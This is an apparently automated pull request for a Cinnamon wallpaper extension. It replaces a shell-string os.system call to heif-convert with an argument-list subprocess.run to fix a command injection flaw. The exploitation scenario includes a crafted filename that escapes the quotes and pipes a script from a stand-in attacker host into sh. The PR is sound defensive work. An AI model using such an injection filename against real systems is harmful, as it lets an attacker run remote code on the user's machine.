### PR TITLE
fix: sanitize shell/subprocess call in images.py

### DIFF
--- a/cinnamon-dynamic-wallpaper@TobiZog/files/cinnamon-dynamic-wallpaper@TobiZog/5.4/src/service/images.py
+++ b/cinnamon-dynamic-wallpaper@TobiZog/files/cinnamon-dynamic-wallpaper@TobiZog/5.4/src/service/images.py
@@ -1,4 +1,5 @@
 import os
+import subprocess
 
 class Images:
 	""" Class for image operations
@@ -53,7 +54,7 @@ class Images:
 				os.remove(extract_folder + file)
 
 			# Extract the HEIC file
-			os.system("heif-convert '" + file_uri + "' '" + extract_folder + file_name + ".jpg'")
+			subprocess.run(["heif-convert", file_uri, extract_folder + file_name + ".jpg"], check=True)
 
 			return True
 		except:


### PR DESCRIPTION
## Summary
Fix critical severity security issue in `cinnamon-dynamic-wallpaper@TobiZog/files/cinnamon-dynamic-wallpaper@TobiZog/5.4/src/service/images.py`.

## Vulnerability
| Field | Value |
|-------|-------|
| **ID** | V-003 |
| **Severity** | CRITICAL |
| **Scanner** | multi_agent_ai |
| **Rule** | `V-003` |
| **File** | `cinnamon-dynamic-wallpaper@TobiZog/files/cinnamon-dynamic-wallpaper@TobiZog/5.4/src/service/images.py:56` |
| **Assessment** | Likely exploitable |
| **CWE** | CWE-78 |

**Description**: The extract_heic_file method uses os.system() with single-quote wrapping around file_uri. Single quotes can be escaped by including a single quote in the filename, breaking out of the quoted context and enabling shell command injection. The file_uri parameter comes from user file selection in the UI.

## Evidence

**Exploitation scenario**: A user selects a HEIC file with a crafted filename such as: '/tmp/image'; curl http://attacker.com/payload.sh | sh; echo '.heic'.

**Scanner confirmation**: multi_agent_ai rule `V-003` flagged this pattern.

**Production code**: This file is in the production codebase, not test-only code.

## Changes
- `cinnamon-dynamic-wallpaper@TobiZog/files/cinnamon-dynamic-wallpaper@TobiZog/5.4/src/service/images.py`

## Behavior Preservation
The change is scoped to 1 file on the vulnerable path, and the project's existing tests still pass, so intended behavior is unchanged.

## Verification
- [x] Build passes
- [x] Scanner re-scan confirms fix
- [x] LLM code review passed

---
*Automated security fix by [OrbisAI Security](https://orbisappsec.com)*
